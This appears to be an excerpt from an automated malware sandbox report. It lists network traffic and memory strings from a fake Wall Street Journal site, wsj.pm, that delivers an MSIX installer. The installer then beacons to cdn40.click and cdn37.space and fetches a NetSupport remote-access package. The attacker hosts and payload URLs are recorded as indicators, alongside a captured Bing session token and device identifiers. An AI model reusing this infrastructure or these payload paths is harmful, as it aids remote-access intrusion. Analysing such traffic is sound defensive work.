                                    Source: global trafficHTTP traffic detected: GET /img/im-949723.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-44291453.avif HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-647221.avif HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/google-play.4699f3c2.svg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/appstore.a6e93ba3.svg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/wsj-logo-big-black.e653dfca.svg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DxOPtc+GXgku2Br&MD=fPkl8aYr HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                                    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                                    Source: global trafficHTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
                                    Source: global trafficHTTP traffic detected: GET /client/config?cc=CH&setlang=en-CH HTTP/1.1X-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-UserAgeClass: UnknownX-BM-Market: CHX-BM-DateFormat: dd/MM/yyyyX-Device-OSSKU: 48X-BM-DTZ: 120X-DeviceID: 01000A41090080B6X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAfzLBKdQCm28CuuxSNuYztu7EsL7kM769LErRWmNGF0YaycAS/EF10D5AFL6ce5V6NubDyyAlEankxphWwbF3Zkcodae1JTiS82W5IqxsAZeIGIp7QaY6JTHKtRqt6KEyC7zcbmSdNqvjmfJnoE%2BYuJIWIOMvj9e61j67iSOsaW5yPtDm6A2Ko8k4kHvl9/y4OUYw7tos%2BqX7a4ajNojcn/%2BDbwK3H1IdFpEKv1oyFblwSLD/wqQ%2BOO4/XbmYMWd13OqRnoWy5/spJAcJnE8ZC9LKpqS2jPGInoQC6TbPU/y5J%2BxITZtEzQSCHjr16fdOhoPhBPAuaWyDmETEVNgdiwDZgAACKN/6GJ5hpirqAEcFppM/deTNK56h1fTsecQj6efW5sXGKIkb3Vb8yln%2BfGBzzH0wpS8cDLWTHoIgQzzC8PG/u1cCyFQ4nVgzCHM/ePS3Oe6yjui0nWDzNf2nMzcumEakiioNdNK/kN%2B1GY321OPE3p/BvtKwSMdr1%2Bc2IySS9Vc5o2PMLFR0q9euc9w%2BfJliN1EmcTHg9RYAomP3lXn763OoOEhblBx/VJrrUuwAaONp6Htg2s9szOieqv9dfGEkmwIUPkreePKED3QSTHdizIvkyD2ArEj181uEfEKFN0m7phP9ItbB05/LfQ82qVa7S6QucixnvjrolClT5Lwdc9T1w9T2XaIOYyzpmi%2BzcvTSudcp03zV9iyFr63AAle78T86hWtHziucLicgJTKDs/b8TV2EpUjPEIBRV2u81H4fMkbTaoOHVey9jj6iYx%2B/pAGeatoNz1Bsbn1XMcY5R9nv379Aax/6bj%2Brwhs6trImm9Q3jabPfKdI0HDeiZI747w1MqX/lOOi61lecoVwppq42ulTvxSMkQNCgWZN5djPBDl1ScMHpQTrnIAlpjTeycr2gE%3D%26p%3DX-Agent-DeviceId: 01000A41090080B6X-BM-CBT: 1714057116User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045X-Device-isOptin: falseAccept-language: en-GB, en, en-USX-Device-Touch: falseX-Device-ClientSession: 75625C546F974997B6B8D64F1964277DX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIHost: www.bing.comConnection: Keep-AliveCookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                    Source: global trafficHTTP traffic detected: GET /download.php HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /files/WSJ.msix HTTP/1.1Host: cdn40.clickConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DxOPtc+GXgku2Br&MD=fPkl8aYr HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                                    Source: global trafficHTTP traffic detected: GET /download.php HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxAm=Windows%20Defender&ancOgcW=GPedA&BjxYYHPLrzLmCYuBVxOLtmKj=Microsoft+Windows+10+Pro&aEoLMFrJkYQED=25&sbhadkcjUpbj=d99844e1-4599-410e-aa0d-b504c5ca3ddf&File=wsj&jAWWnA=w&zbzPFbbhcIkxLubqNgOzVPy=90dab6f9-11b1-408a-af36-86b217e34b87 HTTP/1.1User-Agent: myUserAgentHereHost: cdn40.clickConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsd&iud=90dab6f9-11b1-408a-af36-86b217e34b87 HTTP/1.1User-Agent: myUserAgentHereHost: cdn37.spaceConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /files/netsupport25.zip HTTP/1.1Host: cdn37.space
                                    Source: global trafficHTTP traffic detected: GET /73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxAm=Windows%20Defender&ancOgcW=GPedA&BjxYYHPLrzLmCYuBVxOLtmKj=Microsoft+Windows+10+Pro&aEoLMFrJkYQED=25&sbhadkcjUpbj=d99844e1-4599-410e-aa0d-b504c5ca3ddf&File=wsj&jAWWnA=w&zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c HTTP/1.1User-Agent: myUserAgentHereHost: cdn40.clickConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1Host: cdn40.click
                                    Source: global trafficHTTP traffic detected: GET /974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsp&ahsdjkasjkdh=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c HTTP/1.1Host: cdn40.click
                                    Source: global trafficHTTP traffic detected: GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1Host: cdn40.click
                                    Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                    Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                    Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                    Source: global trafficDNS traffic detected: DNS query: wsj.pm
                                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                                    Source: global trafficDNS traffic detected: DNS query: cdn40.click
                                    Source: global trafficDNS traffic detected: DNS query: www.google.com
                                    Source: global trafficDNS traffic detected: DNS query: cdn37.space
                                    Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                    Source: unknownHTTP traffic detected: POST /9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95 HTTP/1.1Host: cdn40.clickConnection: keep-aliveContent-Length: 252sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: https://wsj.pmSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 14:59:46 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 879f32e4f9eb7b94-ATLCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lpO2r4fs25YzisX9YLOcwDB82LXIOVmigH3XY%2FFt67AmUUvniElkOaPdgZmArGqppH%2F8FlUuDxQmnY%2FPc%2FsNACxS8lgRTe5PUJ2RmA9z1zD21d%2BOYMBhqFgbGMcfZpAYWX%2BTRmneJHv%2FopjQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 14:59:46 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 879f32e82dd844fb-ATLCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6SrsSnqixI3RpKqX%2FZUq7nKTdWLt9aLmUfGW8t0eOlRH1f1EslcbspDPTWflaGdC8mouJqcFzXWVIEyUAsbXrmrGqdWf8ObwhW4bmNHSTKSNhbBXy9%2FbjNzvLQTDXeOZtM%2BEc15T0difRof"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 14:59:47 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 879f32eb4ea069f2-ATLCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdmZL%2B3RJLcDnTaFr83qRRF8nS%2F%2BnqX9D09jHlAuck7c2%2BV4bzbZgHpxZ00TGk0I7NRAFz0YdbJxdcAcmoP%2Bh%2BRwCW4jWIJhKb2cOrK8xP%2FRmkYT%2Brsyjt7xFzl1UT95yt8BkTYpbhPgdKg6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                    Source: client32.exe, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.drString found in binary or memory: http://%s/fakeurl.htm
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.drString found in binary or memory: http://%s/testpage.htm
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                    Source: client32.exe, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://127.0.0.1
                                    Source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                    Source: AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/cps.html0
                                    Source: AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/last.crl0G
                                    Source: AppInstaller.exe, 0000000E.00000003.1680617833.00000196D5F42000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acedicom.edicomgroup.com/doc0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv10.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/ocsp0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
